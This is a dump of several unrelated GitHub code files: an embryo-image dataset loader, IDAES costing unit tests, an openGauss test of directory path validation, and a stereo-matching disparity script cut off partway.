pprint(data)\n#\ndb.connect('../db.sqlite')\n#\nsite_anime_db.save_production(data)\n#\ndb.disconnect()\n","repo_name":"LeandroDeJesus-S/animanage","sub_path":"scrapings/onimesonline_online_scrap.py","file_name":"onimesonline_online_scrap.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"43372749842","text":"import enum as enum\nfrom plato.datasources import base\nimport os\nimport pandas as pd\nfrom PIL import Image as Image\nfrom typing import Callable, Tuple, Any, Optional\nfrom torchvision.datasets import VisionDataset\nimport numpy as np\nimport torch\nimport numpy\nfrom torchvision import datasets, transforms\nfrom sklearn.model_selection import train_test_split\nfrom plato.config import Config\nimport logging\n\nclass EmbryosDataset(VisionDataset):\n\n def __init__(\n self, data, targets, clinic_ids, root = \"\", transform: Optional[Callable] = transforms.ToTensor(), target_transform: Optional[Callable] = None) \\\n -> None:\n super().__init__(root=root, transform=transform, target_transform=target_transform)\n self.data = data\n self.transform = transform\n self.target_transform = target_transform\n self.targets = targets\n self.clinic_ids = clinic_ids\n self._root = root\n self.classes = [0, 1]\n\n def __len__(self):\n return len(self.targets)\n\n def __getitem__(self, index: int) -> Tuple[Any, Any]:\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n sampleId = self.data.iloc[[index]]['SampleID'].values[0]\n file_path = os.path.join(self._root, \"{:05d}.npz\".format(sampleId))\n img, target = self._load_image(file_path), int(self.targets[index])\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target\n \n \n def _load_image(self, path):\n file_data = np.load(path)\n images = file_data['images']\n\n focal = 1\n frame = 0\n img_raw = images[frame, :, :, focal]\n img = Image.fromarray(img_raw)\n newsize = (250, 250)\n img = img.resize(newsize)\n img_raw = np.asarray(img)\n img_raw = img_raw.astype('float32') / 255\n return img_raw\n\nclass DataSource(base.DataSource):\n def __init__(self, client_id=0):\n super().__init__()\n self._oversampling = False\n self.trainset = None\n self.testset = None\n self.validationset = None\n self._root = \"/mnt/data/mlr_ahj_datasets/vitrolife/dataset/\"\n\n #Loading in the meta data file\n metadata_file_path = os.path.join(self._root, \"metadata.csv\")\n self._meta_data = pd.read_csv(metadata_file_path)\n \n # If indicated in the config file - The clients will be using the labIds in the order from most data to least, meaning that when using a lower amount of clients than labIds the labs with the lowest amount of training data are not used\n sortedIds = self._size_sort_client_ids() if (hasattr(Config().data, \"size_sorted\") and Config().data.size_sorted) else range(23)\n if client_id != 0: logging.info(\"client-id #%d will be designated labId #%d\", client_id, sortedIds[client_id-1])\n \n # Splitting train, test and validation data\n meta_data_train_validation = self._meta_data.loc[self._meta_data['Testset'] == 0]\n meta_data_test = self._meta_data.loc[self._meta_data['Testset'] == 1]\n \n if client_id != 0:\n client_train_validation_data = meta_data_train_validation.loc[meta_data_train_validation['LabID'] == sortedIds[client_id-1]]\n client_train_data, client_validation_data = train_test_split(client_train_validation_data, test_size=0.172, random_state=42)\n client_test_data = meta_data_test.loc[meta_data_test['LabID'] == sortedIds[client_id-1]]\n else:\n client_train_data, client_validation_data = train_test_split(meta_data_train_validation, test_size=0.172, random_state=42)\n client_test_data = meta_data_test\n\n #Loading in data\n train_data, train_targets, train_clinic_ids = self._load_data_type(client_train_data)\n validation_data, validation_targets, validation_clinic_ids = self._load_data_type(client_validation_data)\n test_data, test_targets, test_clinic_ids = self._load_data_type(client_test_data)\n\n self.trainset = EmbryosDataset(data=train_data, targets=train_targets, clinic_ids=train_clinic_ids, root=self._root)\n self.validationset = EmbryosDataset(data=validation_data, targets=validation_targets, clinic_ids=validation_clinic_ids, root=self._root)\n self.testset = EmbryosDataset(data=test_data, targets=test_targets, clinic_ids=test_clinic_ids, root=self._root)\n\n def _size_sort_client_ids(self):\n logging.info(\"Sorting Embryo dataset based on lab size\")\n ids = range(23)\n sizes = []\n train_val_data = self._meta_data.loc[self._meta_data['Testset'] == 0]\n for id in ids:\n sizes.append(len(train_val_data.loc[train_val_data['LabID'] == id]))\n assert(len(sizes) == 23)\n sortedIds = [x for _,x in sorted(zip(sizes,ids), reverse=True)]\n self.sortedIds = sortedIds\n return sortedIds\n\n\n\n def _load_data_type(self, metadata):\n data = metadata\n labels = data[\"Label\"].tolist()\n labels = torch.LongTensor(labels)\n clinic_ids = data[\"LabID\"].tolist()\n clinic_ids = torch.LongTensor(clinic_ids)\n \n return data, labels, clinic_ids","repo_name":"thecml/fedasync-with-fairness","sub_path":"src/plato/datasources/embryos.py","file_name":"embryos.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"22487178275","text":"import pytest\n\nfrom pyomo.environ import ConcreteModel, Constraint, Set, units as pyunits, Var, Param\nfrom pyomo.util.check_units import assert_units_consistent, assert_units_equivalent\n\nfrom idaes.core import declare_process_block_class, UnitModelBlockData\nfrom idaes.core.util.model_statistics import degrees_of_freedom\n\nfrom idaes.core import (\n FlowsheetCostingBlock,\n FlowsheetCostingBlockData,\n UnitModelCostingBlock,\n register_idaes_currency_units,\n)\n\n# TODO : Tests for cases with multiple costing packages\npyunits.load_definitions_from_strings([\"USD_test = [test_currency]\"])\n\n\n@pytest.mark.unit\ndef test_register_idaes_currency_units():\n # Register standard currency units\n register_idaes_currency_units()\n\n assert \"USD_CE500\" in pyunits.pint_registry\n\n CEI = {\n \"USD_1990\": 357.6,\n \"USD_1991\": 361.3,\n \"USD_1992\": 358.2,\n \"USD_1993\": 359.2,\n \"USD_1994\": 368.1,\n \"USD_1995\": 381.1,\n \"USD_1996\": 381.7,\n \"USD_1997\": 386.5,\n \"USD_1998\": 389.5,\n \"USD_1999\": 390.6,\n \"USD_2000\": 394.1,\n \"USD_2001\": 394.3,\n \"USD_2002\": 395.6,\n \"USD_2003\": 402.0,\n \"USD_2004\": 444.2,\n \"USD_2005\": 468.2,\n \"USD_2006\": 499.6,\n \"USD_2007\": 525.4,\n \"USD_2008\": 575.4,\n \"USD_2009\": 521.9,\n \"USD_2010\": 550.8,\n \"USD_2011\": 585.7,\n \"USD_2012\": 584.6,\n \"USD_2013\": 567.3,\n \"USD_2014\": 576.1,\n \"USD_2015\": 556.8,\n \"USD_2016\": 541.7,\n \"USD_2017\": 567.5,\n \"USD_2018\": 603.1,\n \"USD_2019\": 607.5,\n \"USD_2020\": 596.2,\n \"USD_2021\": 708.0,\n }\n\n for c, conv in CEI.items():\n assert c in pyunits.pint_registry\n\n assert pytest.approx(conv / 500, rel=1e-10) == pyunits.convert_value(\n 1, pyunits.USD_CE500, getattr(pyunits, c)\n )\n\n\nclass TestFlowsheetCostingBlock:\n @pytest.mark.unit\n def test_basic_attributes(self):\n m = ConcreteModel()\n\n with pytest.raises(\n ValueError,\n match=\"costing - costing package has not specified the base \"\n \"currency units to use for costing.\",\n ):\n m.costing = FlowsheetCostingBlock()\n\n assert m.costing.base_currency is None\n assert m.costing.base_period is pyunits.year\n assert m.costing.defined_flows == {}\n assert FlowsheetCostingBlockData.unit_mapping == {}\n\n @pytest.mark.unit\n def test_build_global_params(self):\n with pytest.raises(\n NotImplementedError,\n match=\"Derived class has not defined a \" \"build_global_params method.\",\n ):\n FlowsheetCostingBlockData.build_global_params(self)\n\n @pytest.mark.unit\n def test_build_process_costs(self):\n with pytest.raises(\n NotImplementedError,\n match=\"Derived class has not defined a \" \"build_process_costs method.\",\n ):\n FlowsheetCostingBlockData.build_process_costs(self)\n\n @pytest.mark.unit\n def test_initialize_build(self):\n with pytest.raises(\n NotImplementedError,\n match=\"Derived class has not defined an \" \"initialize_build method.\",\n ):\n FlowsheetCostingBlockData.initialize(self)\n\n\n# Create some dummy classes to represent inherited unit models\n@declare_process_block_class(\"TypeA\")\nclass TypeAData(UnitModelBlockData):\n def build(self):\n super().build()\n self.class_type = \"A\"\n\n\n@declare_process_block_class(\"TypeB\")\nclass TypeBData(TypeAData):\n def build(self):\n super().build()\n self.class_type = \"B\"\n\n\n@declare_process_block_class(\"TypeC\")\nclass TypeCData(TypeBData):\n def build(self):\n super().build()\n self.class_type = \"C\"\n\n\n@declare_process_block_class(\"TypeD\")\nclass TypeDData(TypeAData):\n def build(self):\n super().build()\n self.class_type = \"D\"\n\n\n@declare_process_block_class(\"TypeE\")\nclass TypeEData(UnitModelBlockData):\n def build(self):\n super().build()\n self.class_type = \"E\"\n\n\n@declare_process_block_class(\"DummyCostingPackage\")\nclass DummyCostingPackageData(FlowsheetCostingBlockData):\n def build_global_params(self):\n self.base_currency = pyunits.USD_test\n self.base_period = pyunits.year\n\n self.test_flow_2_cost = Param(initialize=0.07, units=pyunits.kW)\n\n self.defined_flows = {\n \"test_flow_1\": 0.2 * pyunits.J,\n \"test_flow_2\": self.test_flow_2_cost,\n }\n\n self._bgp = True\n\n def build_process_costs(self):\n self._bpc = True\n\n def initialize_build(self):\n self._init = True\n\n def method_1(blk):\n blk.cost_method = 1\n\n def method_2(blk):\n blk.cost_method = 2\n\n def method_3(blk):\n blk.cost_method = 3\n\n def method_4(blk):\n blk.cost_method = 4\n\n unit_mapping = {TypeA: method_1, TypeB: method_2, TypeC: method_3}\n\n\nclass TestFlowsheetCostingBlock:\n @pytest.mark.unit\n def test_costing_package_no_base_currency(self):\n @declare_process_block_class(\"TestCostingPackage2\")\n class TestCostingPackage2Data(DummyCostingPackageData):\n def build_global_params(self):\n super().build_global_params()\n self.base_currency = None\n\n m = ConcreteModel()\n\n with pytest.raises(\n ValueError,\n match=\"costing - costing package has not specified the base \"\n \"currency units to use for costing.\",\n ):\n m.costing = TestCostingPackage2()\n\n @pytest.fixture(scope=\"class\")\n def costing(self):\n m = ConcreteModel()\n m.costing = DummyCostingPackage()\n\n return m\n\n @pytest.mark.unit\n def test_basic_attributes(self, costing):\n assert costing.costing._registered_unit_costing == []\n assert isinstance(costing.costing.flow_types, Set)\n assert len(costing.costing.flow_types) == 2\n assert \"test_flow_1\" in costing.costing.flow_types\n assert costing.costing._registered_flows == {\n \"test_flow_1\": [],\n \"test_flow_2\": [],\n }\n\n assert costing.costing._costing_methods_map == {\n TypeAData: DummyCostingPackageData.method_1,\n TypeBData: DummyCostingPackageData.method_2,\n TypeCData: DummyCostingPackageData.method_3,\n }\n\n # Check that test_flow_1 was properly defined\n assert isinstance(costing.costing.test_flow_1_cost, Var)\n assert costing.costing.test_flow_1_cost.value == 0.2\n assert_units_equivalent(costing.costing.test_flow_1_cost.get_units(), pyunits.J)\n\n assert isinstance(costing.costing.test_flow_2_cost, Param)\n\n # Test that build_global_parameters was called successfully\n assert costing.costing._bgp\n\n @pytest.mark.unit\n def test_register_flow_type(self, costing):\n costing.costing.register_flow_type(\n \"test_flow\", 42 * pyunits.USD_test / pyunits.mol\n )\n\n assert isinstance(costing.costing.test_flow_cost, Var)\n assert costing.costing.test_flow_cost.value == 42\n assert_units_equivalent(\n costing.costing.test_flow_cost.get_units(), pyunits.USD_test / pyunits.mol\n )\n assert \"test_flow\" in costing.costing.flow_types\n\n assert costing.costing._registered_flows == {\n \"test_flow_1\": [],\n \"test_flow_2\": [],\n \"test_flow\": [],\n }\n\n @pytest.mark.unit\n def test_register_flow_component_exists(self, costing):\n costing.costing.test_flow_3_cost = Var()\n with pytest.raises(\n RuntimeError,\n match=\"Component test_flow_3_cost already exists on costing but is not 42.\",\n ):\n costing.costing.register_flow_type(\"test_flow_3\", 42)\n # cleanup for next test\n costing.costing.flow_types.remove(\"test_flow_3\")\n costing.costing.del_component(costing.costing.test_flow_3_cost)\n\n @pytest.mark.unit\n def test_cost_flow_invalid_type(self, costing):\n with pytest.raises(\n ValueError,\n match=\"foo is not a recognized flow type. Please \"\n \"check your spelling and that the flow type has \"\n \"been registered with the FlowsheetCostingBlock.\",\n ):\n costing.costing.cost_flow(42, \"foo\")\n\n @pytest.mark.unit\n def test_cost_flow_indexed_var(self, costing):\n costing.indexed_var = Var(\n [1, 2, 3], initialize=1, units=pyunits.mol / pyunits.s\n )\n with pytest.raises(\n TypeError,\n match=\"indexed_var is an indexed component. Flow \"\n \"costing only supports unindexed components.\",\n ):\n costing.costing.cost_flow(costing.indexed_var, \"test_flow\")\n\n @pytest.mark.unit\n def test_cost_flow_unbounded_var(self, costing, caplog):\n costing.costing.cost_flow(costing.indexed_var[1], \"test_flow\")\n\n warn_str = (\n \"indexed_var[1] has a lower bound of less \"\n \"than zero. Costing requires that all flows have a \"\n \"lower bound equal to or greater than zero to \"\n \"avoid negative costs.\"\n )\n\n assert warn_str in caplog.text\n\n @pytest.mark.unit\n def test_cost_flow_var(self, costing):\n costing.indexed_var[1].setlb(0)\n\n costing.costing.cost_flow(costing.indexed_var[1], \"test_flow\")\n\n assert costing.indexed_var[1] in costing.costing._registered_flows[\"test_flow\"]\n\n @pytest.mark.unit\n def test_cost_flow_unbounded_expr(self, costing, caplog):\n costing.costing.cost_flow(-costing.indexed_var[2], \"test_flow\")\n\n warn_str = (\n \"flow_expr is an expression with a lower \"\n \"bound of less than zero. Costing requires that \"\n \"all flows have a lower bound equal to or greater \"\n \"than zero to avoid negative costs.\"\n )\n\n assert warn_str in caplog.text\n\n @pytest.mark.unit\n def test_cost_flow_expr(self, costing):\n costing.indexed_var[2].setub(0)\n\n costing.costing.cost_flow(-costing.indexed_var[2], \"test_flow\")\n\n assert str(-costing.indexed_var[2]) == str(\n costing.costing._registered_flows[\"test_flow\"][-1]\n )\n\n @pytest.mark.unit\n def test_get_costing_method_for(self, costing):\n costing.unit_a = TypeA()\n costing.unit_b = TypeB()\n costing.unit_c = TypeC()\n costing.unit_d = TypeD()\n costing.unit_e = TypeE()\n\n assert isinstance(costing.unit_a, TypeAData)\n\n assert (\n costing.costing._get_costing_method_for(costing.unit_a)\n is DummyCostingPackageData.method_1\n )\n\n assert (\n costing.costing._get_costing_method_for(costing.unit_b)\n is DummyCostingPackageData.method_2\n )\n\n assert (\n costing.costing._get_costing_method_for(costing.unit_c)\n is DummyCostingPackageData.method_3\n )\n\n # TypeD not registered with property package, but inherits from TypeA\n # Should get method_1\n assert (\n costing.costing._get_costing_method_for(costing.unit_d)\n is DummyCostingPackageData.method_1\n )\n\n # TypeE not registered with property package and no inheritance\n # Should return RuntimeError\n with pytest.raises(\n RuntimeError,\n match=\"Could not identify default costing method \"\n \"for unit_e. This implies the unit model's class \"\n \"and parent classes do not exist in the default \"\n \"mapping provided by the costing package. Please \"\n \"provide a specific costing method for this unit.\",\n ):\n costing.costing._get_costing_method_for(costing.unit_e)\n\n @pytest.mark.unit\n def test_cost_unit_first(self, costing):\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing\n )\n\n assert costing.unit_a.costing.cost_method == 1\n\n assert costing.unit_a.costing in costing.unit_a._initialization_order\n assert costing.unit_a.costing in costing.costing._registered_unit_costing\n\n @pytest.mark.unit\n def test_del_unit_costing(self, costing):\n costing.unit_a.del_component(costing.unit_a.costing)\n\n assert not hasattr(costing.unit_a, \"costing\")\n assert costing.unit_a._initialization_order == []\n assert costing.costing._registered_unit_costing == []\n\n @pytest.mark.unit\n def test_cost_unit_duplicate(self, costing):\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing\n )\n\n # First, check implicit replacement\n # This should work\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing,\n costing_method=DummyCostingPackageData.method_2,\n )\n\n assert costing.unit_a.costing.cost_method == 2\n\n assert costing.unit_a.costing in costing.unit_a._initialization_order\n assert costing.unit_a.costing in costing.costing._registered_unit_costing\n\n # Then check double costing\n with pytest.raises(\n RuntimeError,\n match=\"Unit model unit_a already has a costing block \"\n \"registered: unit_a.costing. Each unit may only have a single \"\n \"UnitModelCostingBlock associated with it.\",\n ):\n costing.unit_a.costing2 = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing\n )\n\n # Clean everything up at the end\n costing.unit_a.del_component(costing.unit_a.costing)\n costing.unit_a.del_component(costing.unit_a.costing2)\n\n # Make sure we cleaned up\n assert not hasattr(costing.unit_a, \"costing\")\n assert not hasattr(costing.unit_a, \"costing2\")\n\n @pytest.mark.unit\n def test_cost_unit_custom_method(self, costing):\n def custom_method(blk):\n blk.capital_cost = Var(\n initialize=1, bounds=(0, 1e10), units=pyunits.USD_test\n )\n blk.fixed_operating_cost = Var(\n initialize=1, bounds=(0, 1e10), units=pyunits.USD_test / pyunits.year\n )\n blk.variable_operating_cost = Var(\n initialize=1, bounds=(0, 1e10), units=pyunits.USD_test / pyunits.year\n )\n\n blk.capital_cost_constraint = Constraint(\n expr=blk.capital_cost == 4.2e6 * pyunits.USD_test\n )\n blk.fixed_operating_cost_constraint = Constraint(\n expr=blk.fixed_operating_cost == 1e2 * pyunits.USD_test / pyunits.year\n )\n blk.variable_operating_cost_constraint = Constraint(\n expr=blk.variable_operating_cost\n == 7e4 * pyunits.USD_test / pyunits.year\n )\n\n blk._checkvar = True\n\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=custom_method\n )\n\n assert isinstance(costing.unit_a.costing, UnitModelCostingBlock)\n assert costing.unit_a.costing in costing.unit_a._initialization_order\n assert costing.unit_a.costing in costing.costing._registered_unit_costing\n\n assert isinstance(costing.unit_a.costing.capital_cost, Var)\n assert isinstance(costing.unit_a.costing.variable_operating_cost, Var)\n assert isinstance(costing.unit_a.costing.fixed_operating_cost, Var)\n assert costing.unit_a.costing._checkvar\n\n @pytest.mark.unit\n def test_cost_unit_capital_cost_not_var(self, costing):\n def dummy_method(blk):\n blk.capital_cost = \"foo\"\n\n with pytest.raises(\n TypeError,\n match=\"unit_b capital_cost component must be a \"\n \"Var. Please check the costing package you are \"\n \"using to ensure that all costing components are \"\n \"declared as variables.\",\n ):\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_capital_cost_lb(self, costing, caplog):\n def dummy_method(blk):\n blk.capital_cost = Var()\n\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n assert (\n \"unit_b capital_cost component has a lower bound less than \"\n \"zero. Be aware that this may result in negative costs during \"\n \"optimization.\" in caplog.text\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_fixed_operating_cost_not_var(self, costing):\n def dummy_method(blk):\n blk.fixed_operating_cost = \"foo\"\n\n with pytest.raises(\n TypeError,\n match=\"unit_b fixed_operating_cost component must \"\n \"be a Var. Please check the costing package you \"\n \"are using to ensure that all costing components \"\n \"are declared as variables.\",\n ):\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_fixed_operating_cost_lb(self, costing, caplog):\n def dummy_method(blk):\n blk.fixed_operating_cost = Var()\n\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n assert (\n \"unit_b fixed_operating_cost component has a lower bound less \"\n \"than zero. Be aware that this may result in negative costs \"\n \"during optimization.\" in caplog.text\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_variable_operating_cost_not_var(self, costing):\n def dummy_method(blk):\n blk.variable_operating_cost = \"foo\"\n\n with pytest.raises(\n TypeError,\n match=\"unit_b variable_operating_cost component \"\n \"must be a Var. Please check the costing package \"\n \"you are using to ensure that all costing \"\n \"components are declared as variables.\",\n ):\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_variable_operating_cost_lb(self, costing, caplog):\n def dummy_method(blk):\n blk.variable_operating_cost = Var()\n\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n assert (\n \"unit_b variable_operating_cost component has a lower bound \"\n \"less than zero. Be aware that this may result in negative \"\n \"costs during optimization.\" in caplog.text\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_process(self, costing):\n costing.costing.cost_process()\n\n # Check that build_process_costs was called from costing package\n assert costing.costing._bpc\n\n # Then check aggregation\n assert isinstance(costing.costing.aggregate_capital_cost, Var)\n assert str(costing.costing.aggregate_capital_cost.get_units()) == str(\n pyunits.USD_test\n )\n assert isinstance(costing.costing.aggregate_capital_cost_constraint, Constraint)\n\n assert isinstance(costing.costing.aggregate_fixed_operating_cost, Var)\n assert str(pyunits.USD_test / pyunits.year) == str(\n costing.costing.aggregate_fixed_operating_cost.get_units()\n )\n assert isinstance(\n costing.costing.aggregate_fixed_operating_cost_constraint, Constraint\n )\n\n assert isinstance(costing.costing.aggregate_variable_operating_cost, Var)\n assert str(pyunits.USD_test / pyunits.year) == str(\n costing.costing.aggregate_variable_operating_cost.get_units()\n )\n assert isinstance(\n costing.costing.aggregate_variable_operating_cost_constraint, Constraint\n )\n\n assert isinstance(costing.costing.aggregate_flow_test_flow, Var)\n assert str(pyunits.mol / pyunits.s) == str(\n costing.costing.aggregate_flow_test_flow.get_units()\n )\n assert isinstance(\n costing.costing.aggregate_flow_test_flow_constraint, Constraint\n )\n\n # We also have a test_flow_1 type registered, but no flows costed\n # This should have been skipped\n assert not hasattr(costing.costing, \"aggregate_flow_test_flow_1\")\n assert not hasattr(costing.costing, \"aggregate_flow_test_flow_1_constraint\")\n # unused flows do not get added to aggregate_flow_costs\n assert \"test_flow_1\" not in costing.costing.aggregate_flow_costs\n\n assert isinstance(costing.costing.aggregate_flow_costs, Var)\n assert str(pyunits.USD_test / pyunits.year) == str(\n costing.costing.aggregate_flow_costs.get_units()\n )\n assert len(costing.costing.aggregate_flow_costs) == 1\n assert isinstance(costing.costing.aggregate_flow_costs_constraint, Constraint)\n assert len(costing.costing.aggregate_flow_costs_constraint) == 1\n\n @pytest.mark.unit\n def test_unit_consistency(self, costing):\n assert_units_consistent(costing)\n\n @pytest.mark.unit\n def test_degrees_of_freedom(self, costing):\n costing.indexed_var[1].fix(2)\n costing.indexed_var[2].fix(-3)\n costing.indexed_var[3].fix(0)\n\n assert degrees_of_freedom(costing) == 0\n\n @pytest.mark.unit\n def test_initialize(self, costing):\n costing.costing.initialize()\n\n # Check that initialize was called from costing package\n assert costing.costing._init\n\n # Check that unit-level vars were initialized\n assert costing.unit_a.costing.capital_cost.value == 4.2e6\n assert costing.unit_a.costing.fixed_operating_cost.value == 100\n assert costing.unit_a.costing.variable_operating_cost.value == 7e4\n\n # Check that aggregate vars were initialized\n # Capital and operating costs should equal the unit level ones\n assert costing.costing.aggregate_capital_cost.value == 4.2e6\n assert costing.costing.aggregate_fixed_operating_cost.value == 100\n assert costing.costing.aggregate_variable_operating_cost.value == 7e4\n\n assert costing.costing.aggregate_flow_test_flow.value == 10\n\n assert pytest.approx(\n costing.costing.aggregate_flow_costs[\"test_flow\"].value, rel=1e-12\n ) == (\n pyunits.convert_value(\n 10 * 42, from_units=1 / pyunits.s, to_units=1 / pyunits.year\n )\n )\n","repo_name":"IDAES/idaes-pse","sub_path":"idaes/core/base/tests/test_costing_base.py","file_name":"test_costing_base.py","file_ext":"py","file_size_in_byte":23519,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"8"}
+{"seq_id":"71074254982","text":"import os\nimport unittest\n\nfrom testcase.utils.CommonSH import CommonSH\nfrom testcase.utils.Logger import Logger\nfrom yat.test import Node\nfrom yat.test import macro\n\nlogger = Logger()\n\n\nclass Function(unittest.TestCase):\n\n def setUp(self):\n logger.info(f\"-----{os.path.basename(__file__)}开始执行-----\")\n self.commonsh = CommonSH(\"dbuser\")\n self.userNode = Node(\"dbuser\")\n self.link_path = os.path.join(\"/home\", f\"{self.userNode.ssh_user}\",\n \"my_link0005\")\n\n def test_directory(self):\n text = \"-----前置准备 创建符号链接-----\"\n logger.info(text)\n self.soft_link = [f\"rm -rf {self.link_path}\",\n f\"ln -s /tmp {self.link_path}\"]\n for i in range(2):\n msg = self.userNode.sh(self.soft_link[i]).result()\n logger.info(msg)\n self.assertTrue(len(msg.strip()) == 0, \"执行失败\" + text)\n\n text = \"-----step1+2+3:路径含特殊字符/路径是相对路径/路径是符号连接;expect:-----\"\n logger.info(text)\n error_path = [\"/&~?!tmp/\", \"../tmp/\", f\"{self.link_path}\"]\n error_msg = ['illegal string: \"&\"',\n \"ERROR: directory path cannot be relative\",\n \"is not a directory, please check\"]\n for j in range(3):\n sql_cmd = f\"create or replace directory dir as '{error_path[j]}';\"\n msg1 = self.commonsh.execut_db_sql(sql_cmd)\n logger.info(msg1)\n self.assertTrue(error_msg[j] in msg1, \"执行失败\" + text)\n\n def tearDown(self):\n text = \"清理环境\"\n logger.info(text)\n result = self.userNode.sh(self.soft_link[0]).result()\n logger.info(result)\n self.assertTrue(len(result.strip()) == 0, \"执行失败\" + text)\n logger.info(f\"-----{os.path.basename(__file__)}执行结束-----\")","repo_name":"tttomorrow/1","sub_path":"openGaussBase/testcase/SQL/DDL/directory/Opengauss_Function_DDL_Create_Directory_Case0005.py","file_name":"Opengauss_Function_DDL_Create_Directory_Case0005.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"71358339462","text":"import numpy as np\n# from src.io.psee_loader import PSEELoader\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\n'''\nev - left frame - right\n\n\n'''\n\ndef img_normalization(img,percentile_low = 0.05,percentile_high = 99.95):\n norm_img = img.copy()\n rmin,rmax = np.percentile(norm_img,(percentile_low,percentile_high))\n # print('rmin,rmax',rmin,rmax)\n scale = 255/(rmax - rmin)\n print('min' ,rmin,'max',rmax,'scale',scale)\n norm_img = (norm_img - rmin) * scale\n norm_img = np.uint8(norm_img)\n return norm_img \n\ndef load_data(show_FLAG = False):\n # load event preprocessed img\n\n # ev_img_path ='/Users/cainan/Desktop/Project/data/tsukuba'\n ev_file = '/Users/cainan/Desktop/Project/data/tsukuba/scene1.row3.col5.ppm'\n\n # ev_file = '/Users/cainan/Desktop/Project/data/processed/origin_rectify/origin105ev_rectified_10.png'\n ev_img = cv2.imread(ev_file, 0) # shape (480,640\n\n # load frame preprocessed img\n # prepro_frame_img_path = ev_img_path\n # prepro_frame_img_filename = 'cam1-0noline105fr_canny_rectified1.png'\n # pre_f_file = prepro_frame_img_path + '/' + prepro_frame_img_filename\n # pre_f_file = '/Users/cainan/Desktop/Project/data/processed/origin_rectify/origin105fr_rectified.png'\n pre_f_file = '/Users/cainan/Desktop/Project/data/tsukuba/scene1.row3.col3.ppm'\n pre_frame_img = cv2.imread(pre_f_file, 0) # shape (1536,2048) 3.2times of 480\n\n if ev_img is None or pre_frame_img is None:\n print('Error: Could not load image')\n quit()\n \n if show_FLAG == True:\n cv2.imshow('pre_frame_img',pre_frame_img)\n cv2.imshow('ev_img',ev_img)\n k = cv2.waitKey(0)\n if k == 27: # ESC\n cv2.destroyAllWindows() \n return pre_frame_img, ev_img\n\ndef compute_pyramid_NCC(pre_frame_img,ev_img, template_size = (30,30)): # 60 & 40\n img_height,img_width = pre_frame_img.shape\n stepsize = 1\n step_num = 0\n wrong_num = 0\n test_wr_num =0\n disparity_map = np.zeros((img_height,img_width), np.float16) # change from flaot64 to float16\n template_width, template_height = template_size \n mis_th = int(img_width/7)\n for x in range(int(template_width * 0.5),int(img_width - template_width * 0.5),stepsize):\n for y in range(int(template_height * 0.5),int(img_height - template_height * 0.5),stepsize):\n # for x in range(175,int(img_width - template_width * 0.5),stepsize):\n # for y in range(159,int(img_height - template_height * 0.5),stepsize):\n step_num = step_num + 1\n template_c = (x,y)\n # print(template_c)\n top = template_c[1] -int(template_height * 0.5)\n left = template_c[0] - int(template_width * 0.5)\n template = pre_frame_img[top:top + template_height, left:left + template_width] # TODO top down left right \n\n # NCC_cross correlation only on the epipolar line \n ev_epi_img = ev_img[top:top + template_height,:] # top down left right; shape (20,640)\n epi_result = cv2.matchTemplate(ev_epi_img, template, cv2.TM_CCOEFF_NORMED) # shape (1,621)\n _, max_val, _, max_loc = cv2.minMaxLoc(epi_result)\n e_max_x = max_loc[0] + int(template_width * 0.5) \n disp = template_c[0] - e_max_x\n if disp < 0 or disp > mis_th :\n disparity_map[y,x] = 0\n # print(\"disp\",disp,'================')\n continue \n\n # #debug\n # ev_img_color = cv2.cvtColor(ev_img, cv2.COLOR_GRAY2BGR)\n # cv2.rectangle(ev_img_color, (max_loc[0],top), (max_loc[0] + template_width,top + template_height), (0,255,255), 1) # yellow\n # # cv2.imshow('ev_img_find',ev_img_color)\n\n # color_frame_patch = cv2.cvtColor(pre_frame_img, cv2.COLOR_GRAY2BGR)\n # cv2.circle(color_frame_patch,template_c,2,(0,0,255),-1)\n # cv2.rectangle(color_frame_patch, (left, top), (left + template_width, top + template_height),(0,0,255), 1) # red\n # # cv2.imshow('color_frame_patch',color_frame_patch)\n\n template_height_small = int(template_height * 2 / 3) # smaller window size to compute finer disparity\n template_width_small = template_height_small\n top_small = template_c[1] -int(template_height_small * 0.5)\n left_small = 